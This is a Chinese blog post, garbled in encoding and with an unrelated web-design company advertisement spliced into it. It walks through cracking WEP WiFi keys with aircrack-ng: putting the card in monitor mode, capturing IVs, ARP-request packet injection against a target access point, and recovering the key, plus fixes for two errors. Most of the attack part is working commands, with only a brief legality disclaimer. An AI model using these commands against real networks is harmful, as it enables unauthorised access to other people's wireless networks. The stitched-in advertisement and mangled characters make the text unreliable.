最近無意中接觸到了一些無線方面的技術(shù)資料，又發(fā)現(xiàn)了一個(gè)比較速度的wifi***方法，這個(gè)雖然沒有reaver那么穩(wěn)定，個(gè)人覺得在時(shí)間方面要比reaver快的多。可能做實(shí)驗(yàn)的筆記本太舊的原因，途中遇到幾個(gè)問題，如果有同仁遇到，還請(qǐng)指點(diǎn)一二。此處先記錄下這幾條主要命令備忘。

公司主營業(yè)務(wù)：網(wǎng)站設(shè)計(jì)制作、成都做網(wǎng)站、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)公司是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對(duì)我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)公司推出平湖免費(fèi)做網(wǎng)站回饋大家。

環(huán)境是BT5，默認(rèn)安裝了較高版本，所以不用升級(jí)，但還是附上安裝命令：

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

tar zxvf

cd aircrack-ng-XXX

make

make install

下面就拿WEP加密做示例：

查看無線網(wǎng)卡，一般默認(rèn)是wlan0，如果有外置或其他無線網(wǎng)卡，那就選擇相應(yīng)的網(wǎng)卡啟用即可。

單獨(dú)查看無線網(wǎng)卡信息：iwconfig

啟用無線網(wǎng)卡：ifconfig wlan0 up

激活網(wǎng)卡至監(jiān)聽（monitor）模式：

airmon-ng start wlan0

掃描當(dāng)前地點(diǎn)無線網(wǎng)絡(luò)信息：

airodump-ng mon0

開始抓包，保存為logas前綴的.ivs后綴，6為AP的頻道

airodump-ng --ivs -w longas -c 6 wlan0

在上條命令運(yùn)行的情況下，打開一個(gè)新的終端窗口，輸入下面命令對(duì)目標(biāo)AP進(jìn)行ArpRequest注入***，這樣采用了一種稱之為ArpRequest的方式來讀取ARP請(qǐng)求報(bào)文，并偽造大量的報(bào)文再次重發(fā)出去，以便刺激AP產(chǎn)生更多的數(shù)據(jù)包，從而加快破解過程。

aireplay-ng -3 -b AP-mac -h Client-mac mon0

當(dāng)IVs值達(dá)到2萬以上，可嘗試下面命令破解

aircrack-ng 捕獲的IVS文件

破解成功后，KEYFOUND！后面的ACSI碼就是密碼

PS：

問題1：

當(dāng)在新窗口輸入airodump-ng --ivs -w longas -c 6 wlan0時(shí)，遇到了報(bào)錯(cuò)：

ioctl(SIOCSWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,

AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make

Sysfs injection support was not found either.

我嘗試的方法是使用命令:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0

sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0

就可以了

問題2：

aireplay-ng -3 -b AP-mac -h Client-mac mon0時(shí)，出現(xiàn)了錯(cuò)誤：

Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

因?yàn)檫@條命令并不直接影響結(jié)果，暫時(shí)也沒找到合適解決方法，如果各位有好的解決方法，請(qǐng)指點(diǎn)。

這里只簡單的列出了主要用到的命令，僅供實(shí)驗(yàn)參考，不得用于非法操作，否則后果自負(fù)。